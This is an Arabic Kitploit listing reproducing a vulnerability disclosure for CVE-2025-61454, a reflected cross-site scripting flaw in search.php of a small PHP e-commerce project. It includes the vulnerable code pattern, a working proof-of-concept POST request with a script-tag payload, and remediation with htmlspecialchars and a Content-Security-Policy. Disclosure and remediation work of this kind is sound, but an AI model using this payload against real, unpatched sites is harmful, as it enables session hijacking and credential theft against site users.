Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61454 — إفصاح عام وإثبات مفهوم لـ CVE-2025-61454، وهي ثغرة XSS منعكسة في ملف search.php الخاص بمشروع التجارة الإلكترونية الإصدار 1.0، بما في ذلك خطوات الاستغلال وإرشادات المعالجة. | Kitploit
أدوات/GitHubGitHub/tansique-17/cve-2025-61454
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHubtansique-17/cve-2025-61454

CVE-2025-61454

إفصاح عام وإثبات مفهوم لـ CVE-2025-61454، وهي ثغرة XSS منعكسة في ملف search.php الخاص بمشروع التجارة الإلكترونية الإصدار 1.0، بما في ذلك خطوات الاستغلال وإرشادات المعالجة.

عرض المستودع
4منذ 11 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ إفصاح عن ثغرة أمنية: CVE-2025-61454 — XSS منعكسة في مشروع التجارة الإلكترونية

تاريخ الإفصاح: 14 أكتوبر 2025
معرف CVE: CVE-2025-61454
الخطورة: متوسطة (CVSS 6.1)


🧩 الملخص

توجد ثغرة أمنية من نوع Cross-Site Scripting (XSS) المنعكسة في E-commerce Project v1.0، وتحديدًا داخل نقطة النهاية search.php. يتم عكس الإدخال غير المعقّم في معامل search مباشرةً في استجابة HTML، مما يسمح للمهاجمين بتنفيذ JavaScript عشوائي في متصفح المستخدم الذي يزور رابطًا ضارًا أو يرسل طلبًا مُصممًا بعناية.

تم تخصيص المعرّف CVE-2025-61454 لهذه المشكلة. في وقت الإفصاح، لم يتم إصدار أي تصحيح من قِبل البائع.


📦 المنتج المتأثر

  • البائع: مستقل (Bhabishya-123)
  • المشروع: E-commerce
  • الإصدار: v1.0
  • الملف: search.php
  • نقطة النهاية المعرضة للخطر:
    http://localhost/e-commerce-main/search.php

  • 🔬 تفاصيل الثغرة الأمنية

    يفشل الخادم في تعقيم معامل search من بيانات POST بشكل صحيح قبل عكسه في استجابة HTML. وهذا يسمح للمهاجمين بحقن حمولات JavaScript، مما يؤدي إلى تنفيذ كود من جانب العميل.

    يقوم المهاجم بصياغة إدخال يحتوي على محتوى مضمّن يشبه السكربت وإرساله إلى نقطة النهاية POST المعرضة للخطر. نظرًا لأن الخادم يعكس الإدخال في استجابة HTML دون تطبيق ترميز HTML/سمات/JS مناسب، يعامل المتصفح المحتوى المنعكس كعلامات قابلة للتنفيذ ويقوم بتشغيلها. هذا سيناريو XSS منعكس (غير مستمر)؛ يجب على المهاجم إقناع الضحية بتنفيذ الطلب أو زيارة رابط/نموذج مُنشأ خصيصًا.

    نمط الكود المعرض للخطر (افتراضي):

    root@kitploit:~
    $search = $_POST['search'];
    echo "<div>Search results for: $search</div>";
    

    📌 تصنيف CWE

    معرف CWEالعنوان
    CWE-79تحييد غير صحيح للإدخال أثناء إنشاء صفحة الويب ('Cross-site Scripting')

    📊 درجة CVSS v3.1

    الدرجةالخطورةسلسلة المتجهات
    6.1متوسطةCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

    💥 التأثير

    قد يؤدي الاستغلال الناجح إلى:

    • 🧠 تنفيذ JavaScript عشوائي
    • 🎭 التصيد أو انتحال الشخصية عبر حقن HTML
    • 🍪 اختطاف الجلسة أو سرقة الرموز
    • 🚨 إعادة توجيه قسرية أو تسليم برمجيات خبيثة
    • 🎣 حصاد بيانات الاعتماد عبر نماذج تسجيل دخول مزيفة
    • 📊 تشويه صفحة نتائج البحث

    🧪 إثبات المفهوم (PoC)

    1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/Bhabishya-123/E-commerce.git
    

    2. الاستضافة محليًا

    استخدم XAMPP/LAMP لنشر المشروع والوصول إلى التطبيق.

    3. استغلال الثغرة الأمنية

    📥 طلب نموذجي

    root@kitploit:~
    POST /e-commerce-main/search.php HTTP/1.1
    Host: localhost
    Referer: https://localhost/e-commerce-main/
    Content-Type: application/x-www-form-urlencoded
    
    search=yxo9p%3cscript%3ealert(1)%3c%2fscript%3exnzmd&submit=
    

    📋 الحمولة المفكوكة

    root@kitploit:~
    search=yxo9p<script>alert(1)</script>xnzmd&submit=
    

    📋 الحمولة المحقونة

    root@kitploit:~
    yxo9p<script>alert(1)</script>xnzmd
    

    الشرح:
    يتم تضمين الحمولة <script>alert(1)</script> داخل معامل البحث. عندما يرسل الضحية نموذج بحث بهذه الحمولة الخبيثة (أو يتم خداعه للقيام بذلك عبر الهندسة الاجتماعية)، يتم تنفيذ JavaScript في سياق متصفحه.

    4. النتيجة المتوقعة

    إذا كانت الثغرة موجودة، سيقوم المتصفح بتنفيذ كود JavaScript، مع عرض مربع تنبيه بالقيمة 1. وهذا يؤكد نجاح استغلال XSS.


    🔐 التوصيات

    • ✅ استخدم htmlspecialchars() أو ما يعادله لترميز جميع المخرجات غير الموثوقة قبل عرضها في HTML.
    • 🧰 نفّذ التحقق من صحة الإدخال من جانب الخادم لجميع مدخلات النماذج، خاصة معامل البحث.
    • 🧱 عيّن رؤوس سياسة أمان المحتوى (CSP) قوية لمنع تنفيذ السكربتات المضمّنة.
    • 🚫 تجنب تضمين مدخلات المستخدم غير المعقّمة مباشرةً في استجابات HTML.
    • 🔒 نفّذ ترميز المخرجات المناسب بناءً على السياق (HTML، JavaScript، URL، CSS).
    • 🛡️ استخدم أطر عمل حديثة توفر حماية تلقائية من XSS.

    ✅ مثال على الإصلاح

    root@kitploit:~
    $search = htmlspecialchars($_POST['search'], ENT_QUOTES, 'UTF-8');
    echo "<div>Search results for: $search</div>";
    

    🛡️ مثال على سياسة أمان المحتوى

    root@kitploit:~
    Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
    

    📆 الجدول الزمني

    الحدثالتاريخ
    اكتشاف الثغرة الأمنية16 سبتمبر 2025
    الإفصاح العام13 أكتوبر 2025
    التصحيح المتاح❌ غير متاح وقت الإفصاح

    🙋‍♂️ الاعتمادات

    تم اكتشاف هذه الثغرة الأمنية والإفصاح عنها بواسطة:

    Tansique Dasari
    🔗 GitHub
    ✉️ [email protected]


    🔗 المراجع

    • OWASP - XSS
    • CWE-79 - تصنيف XSS
    • PortSwigger - Cross-site Scripting
    • CVE-2025-61454 على CVE.org

    💬 تم نشر هذا التقرير بشكل مستقل نظرًا لغياب تصحيح رسمي من البائع.

    تنزيل الأداة